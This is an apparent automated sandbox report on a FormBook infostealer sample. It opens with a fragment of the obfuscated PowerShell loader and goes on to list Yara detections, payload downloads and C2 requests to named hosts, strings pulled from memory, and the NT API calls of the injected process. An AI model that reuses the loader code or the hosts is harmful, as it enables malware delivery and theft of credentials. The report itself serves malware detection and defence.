UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao Bloc

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: unknownHTTPS traffic detected: 103.211.216.55:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.83.114.124:443 -> 192.168.2.5:49712 version: TLS 1.2
          Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2595452528.00000000026D1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nPzDKsDmTWqJ.exe, 0000000D.00000002.3286344081.000000000099E000.00000002.00000001.01000000.00000009.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000000.2862732022.000000000099E000.00000002.00000001.01000000.00000009.sdmp
          Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000003.2698808287.000000002118F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2695801155.0000000020FD2000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2793819651.00000000041DB000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2791227539.0000000004027000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000003.2698808287.000000002118F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2695801155.0000000020FD2000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2793819651.00000000041DB000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 0000000E.00000003.2791227539.0000000004027000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: clip.pdb source: wab.exe, 0000000A.00000002.2803637542.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2790925038.0000000005894000.00000004.00000020.00020000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287519662.0000000001228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdbOS_1 source: powershell.exe, 00000006.00000002.2603068995.0000000006DB0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wab.pdbGCTL source: clip.exe, 0000000E.00000002.3034173382.0000000002795000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3035044286.00000000049BC000.00000004.10000000.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3288413199.000000000335C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.3286106030.0000000002C0C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: clip.pdbGCTL source: wab.exe, 0000000A.00000002.2803637542.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2790925038.0000000005894000.00000004.00000020.00020000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000D.00000002.3287519662.0000000001228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wab.pdb source: clip.exe, 0000000E.00000002.3034173382.0000000002795000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 0000000E.00000002.3035044286.00000000049BC000.00000004.10000000.00040000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3288413199.000000000335C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.3286106030.0000000002C0C000.00000004.80000000.00040000.00000000.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then mov ebx, 00000004h14_2_0410053E
          Source: Joe Sandbox ViewIP Address: 137.220.252.40 137.220.252.40
          Source: Joe Sandbox ViewIP Address: 137.220.252.40 137.220.252.40
          Source: Joe Sandbox ViewIP Address: 103.211.216.55 103.211.216.55
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /Teglbrnderier.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: econstramedia.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cyoeNvCnByBgIccf106.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: tejarat-gram.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /abt9/?9Z=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==&et=y8bdBnFxh HTTP/1.1Host: www.387mfyr.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficDNS traffic detected: DNS query: econstramedia.com
          Source: global trafficDNS traffic detected: DNS query: tejarat-gram.com
          Source: global trafficDNS traffic detected: DNS query: www.387mfyr.sbs
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Jul 2024 11:13:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: powershell.exe, 00000002.00000002.2676908223.000001B101E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://econstramedia.com
          Source: powershell.exe, 00000002.00000002.2767467645.000001B110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.2676908223.000001B100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2596172114.00000000041E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000002.00000002.2676908223.000001B100001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000006.00000002.2596172114.00000000041E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.c
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.co
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2676908223.000001B100477000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2676908223.000001B101D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/T
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Te
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teg
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Tegl
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglb
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbr
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrn
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnd
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnde
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnder
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderi
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderie
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderier
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderier.
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderier.s
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderier.sn
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2676908223.000001B10022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderier.snp
          Source: powershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Teglbrnderier.snpXR
          Source: powershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000006.00000002.2603068995.0000000006D19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.mic
          Source: powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: clip.exe, 0000000E.00000002.3034173382.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: clip.exe, 0000000E.00000002.3034173382.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: clip.exe, 0000000E.00000002.3034173382.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: clip.exe, 0000000E.00000002.3034173382.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
          Source: clip.exe, 0000000E.00000002.3034173382.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: clip.exe, 0000000E.00000002.3034173382.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: clip.exe, 0000000E.00000003.2973665142.000000000750C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
          Source: powershell.exe, 00000002.00000002.2767467645.000001B110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/
          Source: wab.exe, 0000000A.00000002.2803376291.0000000005830000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2803162062.00000000056D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/cyoeNvCnByBgIccf106.bin
          Source: wab.exe, 0000000A.00000002.2803376291.0000000005830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/cyoeNvCnByBgIccf106.binO
          Source: wab.exe, 0000000A.00000002.2803162062.00000000056D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/cyoeNvCnByBgIccf106.binRhypsPosvilla-ventura.com/cyoeNvCnByBgIccf106.bin
          Source: wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/cyoeNvCnByBgIccf106.binU
          Source: wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/cyoeNvCnByBgIccf106.binnJ
          Source: wab.exe, 0000000A.00000002.2803376291.0000000005830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/cyoeNvCnByBgIccf106.binq
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownHTTPS traffic detected: 103.211.216.55:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.83.114.124:443 -> 192.168.2.5:49712 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: amsi32_7108.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 4324, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Very long command line found
          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6829
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6853
          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6829Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6853Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_213B2DF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_213B2C70
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B35C0 NtCreateMutant,LdrInitializeThunk,10_2_213B35C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B4340 NtSetContextThread,10_2_213B4340
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B4650 NtSuspendThread,10_2_213B4650
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2B60 NtClose,10_2_213B2B60
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2BA0 NtEnumerateValueKey,10_2_213B2BA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2B80 NtQueryInformationFile,10_2_213B2B80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2BF0 NtAllocateVirtualMemory,10_2_213B2BF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2BE0 NtQueryValueKey,10_2_213B2BE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2AB0 NtWaitForSingleObject,10_2_213B2AB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2AF0 NtWriteFile,10_2_213B2AF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2AD0 NtReadFile,10_2_213B2AD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2D30 NtUnmapViewOfSection,10_2_213B2D30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2D10 NtMapViewOfSection,10_2_213B2D10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2D00 NtSetInformationFile,10_2_213B2D00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2DB0 NtEnumerateKey,10_2_213B2DB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2DD0 NtDelayExecution,10_2_213B2DD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2C00 NtQueryInformationProcess,10_2_213B2C00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2C60 NtCreateKey,10_2_213B2C60
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2CA0 NtQueryInformationToken,10_2_213B2CA0
